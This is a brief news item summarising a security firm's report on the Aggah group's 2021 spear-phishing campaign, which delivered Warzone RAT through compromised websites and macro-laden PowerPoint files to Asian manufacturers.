Marketers should be on the lookout for a new attempt by spear phishing artists to hijack their sites.
The Pakistan-based threat actor Aggah is allegedly using sites to deliver Warzone Rat, a very dangerous form of malware, to manufacturing sites in Taiwan and South Korea, cyber security firm Anomali reports.
This summer’s campaign started with a custom email pretending to be from “foodHub.co.uk,” an online delivery service.
It's not clear how a hijacked foodHub.co.uk url would have bamboozled manufacturing employees in Asia.
Hoteloscar.in, a website for a hotel in India, has also been compromised, leading them to believe that the threat actors may have exploited a WordPress vulnerability.”
Anomali writes that it “discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group.”
It continues, “Our analysis found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence this is Aggah.”